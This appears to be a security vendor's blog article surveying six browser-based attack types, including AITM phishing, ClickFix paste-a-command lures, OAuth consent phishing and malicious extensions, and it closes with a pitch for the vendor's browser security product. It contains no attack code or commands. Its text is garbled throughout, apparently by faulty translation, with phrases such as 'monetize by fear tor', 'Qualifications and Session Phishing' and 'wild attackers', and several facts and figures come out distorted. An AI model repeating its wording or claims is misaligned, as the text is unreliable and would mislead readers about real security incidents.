In recent years, attacks targeting web browser users have seen an unprecedented increase. In this article, we explore what “browser-based attacks” are and why they have been proven to be extremely effective.
What is a browser-based attack?
First, it is important to establish what a browser-based attack is.
In most scenarios, attackers do not consider themselves to be attacking a web browser. Their ultimate goal is to compromise on business apps and data. That means chasing third-party services, which are the backbone of your business now.
The most common attack paths today are watching attackers log in to third-party services, dump data, and monetize by fear tor. Just look at still-prominent sales force attacks to see Snowflake’s customer infringement or its impact last year.
The most logical way to do this is to target users of those apps. Additionally, changes in labor practices have made users more accessible to external attackers than ever before and are exposed to a wider range of potential attack technologies.
 |
| Browser-based attacks such as AITM phishing, Clickfix and consent phishing have seen an unprecedented increase in recent years. |
Once upon a time, email was the main communication channel with the wider world, with work being done locally, on devices, and within a lockdown network environment. This has made email and endpoints a top priority from a security standpoint.
But now, modern work is being carried out across networks of distributed internet apps, with more diverse communication channels outside of email, making it difficult for users to stop interacting with malicious content (at least without significantly hindering their ability to do the job).
Given that browsers are where business apps are accessed and used, it makes sense that attacks are becoming more and more unfolding.
Six critical browser-based attacks that your security team needs to know
1. Qualifications and Session Phishing
The most direct way for an attacker to compromise a business application is to fish users of that app. You may not necessarily think of phishing as a browser-based attack, but that’s exactly what we’re seeing today.
Phishing touring and infrastructure have evolved significantly over the past decade, but business changes mean there is more vector for phishing attack delivery, as well as both an app and an identity aimed at the target.
Attackers can deliver links via instant messenger apps, social media, SMS, and malicious ads, use in-app messenger features, or bypass email-based checks by sending emails directly from SaaS services. Similarly, there are hundreds of apps with one app on a target, with different levels of account security configuration.
 |
| Phishing is now multi-channel and cross-channel, targeting a vast range of cloud and SaaS apps using flexible AITM toolkits, but all roads inevitably lead to browsers. |
Today, phishing operates on an industrial scale using a set of obfuscation and detection avoidance techniques. The latest generation of fully customized MFA bypass phishing kits dynamically obfuscate the code loading web pages, implement custom bot protection (such as Captcha and CloudFlare Turnstile), use runtime anti-analysis capabilities, and use legitimate SaaS and Cloud Services to host and provide phishing links covering tracks. Learn how modern phishing attacks bypass detection controls here.
These changes make phishing even more effective than ever, making it increasingly difficult to detect and block using email and network-based anti-phishing tools.
2. Malicious Copy & Paste (aka Clickfix, FileFix, etc.)
One of the biggest security trends of the past year is the emergence of attack technology known as Clickfix.
Originally known as “fake captures,” these attacks attempt to manipulate users by tricking them into running malicious commands on their devices, usually by solving some form of verification challenge in their browser.
In reality, by solving the problem, the victim is actually copying malicious code from the page clipboard and running it on the device. Typically, the victim is given instructions that include copying, pasting and running the command directly in the (prompt) dialog box, terminal, or PowerShell. Variants such as FileFix have also appeared, and instead use the File Explorer address bar to execute OS commands, but in recent examples, this attack branch branches fork into the MAC via the MacOS terminal.
Most commonly, these attacks are used to provide Infostealer malware to access business apps and services using stolen session cookies and credentials.
Like modern credentials and session phishing, links to malicious pages are distributed across different delivery channels, using a variety of lures, including impersonating Captcha, CloudFlare Turnstile, and simulating web page load errors. Many of the same protections used to obfuscate and prevent analysis of phishing pages also apply to Clickfix pages, which are equally difficult to detect and block.
 |
| An example of a Clickfix lure used by wild attackers. |
3. Malicious OAuth Integration
Malicious OAuth integration is another way for attackers to compromise apps by tricking their users into allowing their users to integrate with malicious attacker-controlled apps. This is also known as consent phishing.
 |
| Examples of consent phishing. The attacker tricks the victim into allowing an attacker-controlled app with risky privileges. |
This is an effective way for attackers to bypass hardened authentication and access control bypassing the account by avoiding the typical login process. This includes phishing resistant MFA methods like PassKeys, as the standard login process does not apply.
This variant of the attack has recently dominated headlines in an ongoing Salesforce breach. In this scenario, an attacker now tricks the victim into approving an attacker-controlled OAUTH app via Salesforce’s device code authentication flow. This requires users to enter an 8-digit code instead of a password or MFA factor.
 |
| Ongoing Salesforce attacks allow malicious OAUTH apps to access the victim’s Salesforce tenant. |
To prevent malicious OAUTH grants from being granted, close in-app management of user permissions and tenant security settings is required. This is by no means a feat when considering the hundreds of apps used throughout modern enterprises. Many of them are not centrally managed (or in some cases totally unknown) by IT and security teams. Still, it is limited by the controls available to app vendors.
In this case, Salesforce has announced planned changes to approval of OAUTH apps to improve the security spurred by these attacks, but there are more apps with unstable configurations for attackers to use in the future.
4. Malicious browser extensions
Malicious browser extensions are another way for attackers to compromise business apps by extracting session cookies and credentials stored in the browser cache and password manager by observing and capturing when a login occurs.
An attacker does this by creating his own malicious extension, allowing the user to install the installation or allow the user to take over the existing extension and access the browser that is already installed. It’s surprisingly easy for an attacker to purchase and add malicious updates to an existing extension and easily pass security checks on the extension.
News about extension-based compromises have increased along with at least 35 other extensions since the CyberHaven extension was hacked in December 2024. Since then, millions of malicious extensions have been identified and millions of installations.
Typically, employees should not randomly install browser extensions unless they are approved by their security team in advance. However, the reality is that many organizations have little visibility into the expansions they use by their employees, and there is a potential risk of being exposed as a result.
5. Malicious File Delivery
Malicious files have been a central part of malware delivery and qualification theft for many years. Malicious files are distributed through similar means, just as non-mail channels like Malvertising and Drive-by Attacks are used to deliver phishing and Clickfix lures. This leaves malicious file detection for basic known badchecks, sandbox analysis, or runtime analysis on endpoints using proxying (not that useful in the context of Sandbox-Aware malware).
This doesn’t just need to be a malicious executable that drops malware directly onto the device. File downloads can also include additional links that will make users malicious content. In fact, one of the most common types of downloadable content is HTML applications (HTA). This is commonly used to spawn local phishing pages and stealth capture credentials. Recently, attackers have weaponized SVG files for similar purposes, running as a self-contained phishing page that completely makes the fake login portal client-side.
Even if malicious content cannot always be flagged from surface-level inspections of files, recording file downloads in a browser is a useful addition to endpoint-based malware protection, providing another layer of defense against file downloads that either perform client-side attacks or redirect users to malicious web-based content.
6. Stolen credentials and MFA gap
This last attack isn’t that much, but they are products. If your credentials are stolen through phishing or infosealer malware, MFA can be used to take over missing accounts.
This isn’t the most sophisticated attack, but it’s very effective. To compromise on your Snowflake account last year, or to see a JIRA attack earlier this year, you need to make sure that the attacker is looking at the stolen credentials at scale.
Modern enterprises with hundreds of apps are more likely to have no app configured for the required MFA (if possible). Also, even if the app is configured for SSO and connected to a major corporate identity, a local “ghost login” can still exist, and the MFA accepts unnecessary passwords.
You can also observe your login in a browser. In fact, it’s close to the source of universal truth about how employees are actually logged in, the apps they are using, whether there is an MFA, and whether security teams can find and fix security teams before attackers can exploit them.
Conclusion
Attacks are increasingly occurring in browsers. This makes it the perfect place to detect and respond to these attacks. But for now, browsers are a blind spot for most security teams.
Push Security’s browser-based security platform provides comprehensive detection and response capabilities for the major causes of violations. Block browser-based attacks such as AITM phishing with stolen session tokens, credential stuffing, password spraying, and session hijacking. You can also use push to find and fix vulnerabilities across apps used by employees, such as Ghost Logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and high-risk OAUTH integrations.
If you’d like to learn more about how push can help you detect and stop attacks in your browser, check out our latest product overview or book with one of our teams for a live demo.
